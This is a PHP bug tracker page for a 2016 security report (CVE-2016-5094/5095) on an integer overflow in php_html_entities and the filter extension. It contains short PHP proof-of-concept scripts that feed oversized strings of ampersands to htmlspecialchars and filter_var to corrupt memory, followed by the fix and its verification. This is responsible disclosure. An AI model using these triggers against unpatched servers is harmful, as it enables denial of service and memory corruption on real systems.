php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72135 Integer Overflow in php_html_entities()
Submitted: 2016-05-01 18:47 UTC Modified: 2016-05-26 21:04 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: *General Issues
PHP Version: 5.5.35 OS: *
Private report: No CVE-ID: 2016-5094
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
MUST BE VALID
Solve the problem:
44 - 7 = ?
Subscribe to this entry?

 
 [2016-05-01 18:47 UTC] taoguangchen at icloud dot com
Description:
------------
```
static void php_html_entities(INTERNAL_FUNCTION_PARAMETERS, int all)
{
	...
	size_t new_len;
	...
	RETVAL_STRINGL(replaced, (int)new_len, 0);
}
```

The new_len is defined as size_t, then to be a signed int in RETVAL_STRINGL(), that results in new_len into a negative value and get a corrupted string-typed ZVAL.

PoC1:
```
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	var_dump(strlen($str));
	
?>
```

PoC2:
```
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	md5($str);
	
?>
```

Fix:

Checking new_len


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-05-02 02:34 UTC] taoguangchen at icloud dot com
A lot of functions with a corrupted string-typed ZVAL will able to lead to memory error, ex:

defined
class_exists
function_exists
...
trigger_error
date_default_timezone_set
hash_init
...
date
gmdate
...
collator_create
normalizer_normalize
grapheme_strlen
...
 [2016-05-04 14:22 UTC] taoguangchen at icloud dot com
Another example:

```
ZEND_API int add_string_to_string(zval *result, const zval *op1, const zval *op2) /* {{{ */
{
	int length = Z_STRLEN_P(op1) + Z_STRLEN_P(op2);
	char *buf;

	if (IS_INTERNED(Z_STRVAL_P(op1))) {
		buf = (char *) emalloc(length+1);
		memcpy(buf, Z_STRVAL_P(op1), Z_STRLEN_P(op1));
	} else {
		buf = (char *) erealloc(Z_STRVAL_P(op1), length+1);
	}
	memcpy(buf + Z_STRLEN_P(op1), Z_STRVAL_P(op2), Z_STRLEN_P(op2));
```

PoC
```
<?php

ini_set('memory_limit', -1);
$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
"$str";

?>
```
 [2016-05-16 06:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-05-16 06:28 UTC] stas@php.net
Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda and in https://gist.github.com/d07b06bc967ecb94712f729198ae2e81
. Please verify.
 [2016-05-16 07:43 UTC] taoguangchen at icloud dot com
The patch looks OK.
 [2016-05-17 12:55 UTC] taoguangchen at icloud dot com
The similar bug in filter:

```
void php_filter_full_special_chars(PHP_INPUT_FILTER_PARAM_DECL)
{
	char *buf;
	size_t len;
	...
	buf = php_escape_html_entities_ex(Z_STRVAL_P(value), Z_STRLEN_P(value), &len, 1, quotes, SG(default_charset), 0 TSRMLS_CC);
	str_efree(Z_STRVAL_P(value));
	Z_STRVAL_P(value) = buf;
	Z_STRLEN_P(value) = len;
}
```

PoC:
```
<?php

ini_set('memory_limit', -1);
$var = str_repeat('&', 0xffffffff/5);
$var = filter_var($var, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
echo "$var";

?>
```

You need to check all codes that call to php_escape_html_entities_ex/php_escape_html_entities.
 [2016-05-24 23:30 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-24 23:30 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-05-25 00:21 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:51 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:52 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-25 03:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-26 21:04 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5094
 [2016-05-26 21:04 UTC] kaplan@php.net
Use CVE-2016-5094 for the original report that had the "[2016-05-16
06:28 UTC] Fix in security repo as
0da8b8b801f9276359262f1ef8274c7812d3dfda" response. Use CVE-2016-5095
for the additional issue reported in the "[2016-05-17 12:55 UTC]"
comment.
 [2016-07-04 15:02 UTC] kaplan@php.net
Notice CVE-2016-5095 was fixed in 41fc3c76e97a36ff3b505da7d704ca17bb171fdf also part of PHP 5.5.36
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC